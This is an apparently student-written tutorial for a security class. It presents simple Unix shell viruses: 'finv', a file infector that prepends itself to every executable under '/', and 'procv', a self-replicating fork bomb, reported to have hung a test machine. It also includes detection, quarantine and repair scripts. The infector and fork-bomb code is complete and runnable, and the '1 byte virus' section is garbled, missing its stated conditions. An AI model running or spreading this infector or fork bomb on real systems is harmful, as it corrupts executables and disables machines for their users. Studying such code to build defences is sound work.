|
|
This is a series of Unix process and file infecting viruses with a few detection and cleansing mechanisms. They are very simple, but provide enough concept to understand how real Viruses and Anti-viruses work in the general sense. I wrote these as part of a computer security class on viruses, worms, and distributed coordinated attacks. In fact, they might have been my first shell scripts, as scary as that sounds. finv - File Infecting Virus This is a simple yet very malicious file infecting virus with self- recognition and filtering capabilies. Line 1 is exactly what it says..its there so the virus does not infect the same file more than once (explained later). Line 2 uses the 'find' command which sweeps through a specified directory in search of files with particular traits. The specified directory is '/', in other words the top of the file system, thus including everything under it. There are no traits set so it reports all (like a wild card). The 'if' statement begins the filtering process. The '&&' means AND. '[...]' is equivalent to 'test' command, which like the arguments you could send 'find', checks if particular traits or conditions exist. '! -d' makes sure the name reported by 'find' is NOT (!) a directory (-d). The second condition makes sure it is executable (-x). If it is 1) not a directory AND 2) executable, Line 3 is began. If both are not true, the 'else' statement is executed which reports 'noway' to the screen. This is not necessary but it will help determine if the script works correctly. Line 3 uses the same '[...]', or 'test' command. It first uses the 'head' command to read the first line (-n 1) of each file passed from line 2. If the string does not equal (!=) the infection marker (#infect_mark); the file is infected. If the file already contains the marker, it is ignored and once again passes control to 'echo'. This is how it is tamed to not infect the same file twice. 'cat' combines $0 (the virus code) and $infect (the new found host file) and writes it to a file in a temporary directory (/tmp/z). By passing 'cat' two files instead of one, the second is appended to the end of the first, giving the viral code priority (executed first) over any other code embodied in the file. The temporary file is then moved to $infect, thus overwriting the original. ## BEGIN CODE #infect_mark for infect in $(find /); do if [ ! -d $infect ] && [ -x $infect ] then if [ "$(head -n 1 $infect)" != "#infect_mark" ]; then cat $0 \ $infect > /tmp/z; mv /tmp/z $infect; else echo noway; fi; fi; done ## END CODE You can test this code in a small environment rather than the whole '/' directory. Place the virus in the directory with an executable script with '#infection_marker' as the very first line; an executable script without the infection marker; a non-executable file; and a directory containing an executable without the infection marker. The virus itself, executable script with infection marker, and non-executable script will not be affected. For these instances you should get a 'noway' returned. The executable without the marker as well as the similar file within the directory should be infected. Their contents and file size will prove it. The 1 byte Process Virus This script (or single character) can be classified as a (process) virus when the following conditions are met:
When run, it will crash the Unix system immediately. For statistics on it's efficiency and brutality, as well as exactly what it does, see the notes at the end of the 'procv' virus. ## BEGIN CODE ! ## END CODE procv - Process Virus The following code is classified as a process virus. It bases its ability to reproduce infinitely by using a 'while' loop that always returns an exit status of 0 (zero) because the statement in brackets will always be true. As long as (while) the statement is true, the 'eval $0 &' statement will be executed. 'eval' runs the given arguments through command line processing. The given arguments are '$0' (the name of the script invoking this) and '&' (to fork the new child process into the background). So, the script calls itself to be executed infinitely and would continue to do so exponentially. For monitoring purposes, each string prints a unique time stamp by calling the 'date'command with arguments '%D%H%M%S%N', which stand for Day, Hour, Minute, Second, and Nanosecond. It stores this value in the variable named 'nan_time'. Then 'echo' redirects stdout to a file named 'unique.txt'. ## BEGIN CODE while [ 1 ]; do eval $0 &; nan_time=$(date '+%D%H%M%S%N'); echo $nan_time >> unique.txt; done ## END CODE So what?? It hangs the system immediately. 497 of 502 MB RAM were filled instantly, CPU usage raised to 100% and swap space began filling up very fast. Needless to say, the system was useless until rebooted with the reset button on the tower. Prove it! Well, 'unique.txt' was retrieved after rebooting the hung system. It showed 831 strings, meaning the script reproduced 831 times in the allotted time. I assume they are unique because nanosecond precision would only be non-unique if something occurred faster than one billion times per second. The difference between the last time stamp and the first shows the script was active for 41 seconds and 446920000 nanoseconds. dtectiq - Detection With Isolation and Quarantine Dtectiq stands for detection script with isolation and quarantine motive. This is the guy that hunts down all the files previously infected by 'finv' virus. Upon locating each instance of an infected file the script isolates them in a folder together and removes their ability to be executed, either accidentally or intentionally. First it creates a folder named 'jail' in the user who invokes the script's home directory (~). It uses the same 'find' mechanism to locate infected files as 'file_infector' used to locate un-infected files. All files testing positive are removed from their current position and relocated to the 'jail' directory. Here, 'chmod' recursively (-R) removes all user's execute permission of the scripts (a for all; -x for remove execute permission) now in the folder. It does not remove read or write permission so the user can view and/or repair the script after detection. ## BEGIN CODE mkdir ~/jail; for dirty in $(find /); do if [ "$(head -n 1 $dirty)" \ = "#infect_mark" ]; then mv $dirty ~/jail; fi; done; chmod -R a-x ~jail ## END CODE dtectrr - Detection With Remove and Repair Dtectrr stands for detection script with remove and repair motive. It is effective only when knowledge of the virus size and location of the code within the infected file are provided. Here is how it works: Locating: Calculating: Code removal: ## BEGIN CODE # Enter the size of your virus (in characters) CHAR=208 # Enter your virus signature string MARK="#infect_mark" # Enter location of your virus in the file # NOTE: if at the end you want to choose 'head' # and if at the top choose 'tail' -- it seems # backwards but its not. LOC=tail for extract in $(find /); do if [ "$(grep $MARK $extract)" ]; then $LOC -c $(( $(cat $extract | wc -c) - $CHAR)) \ $extract >>/tmp/x; mv /tmp/x $extract; fi; done ## END CODE |
|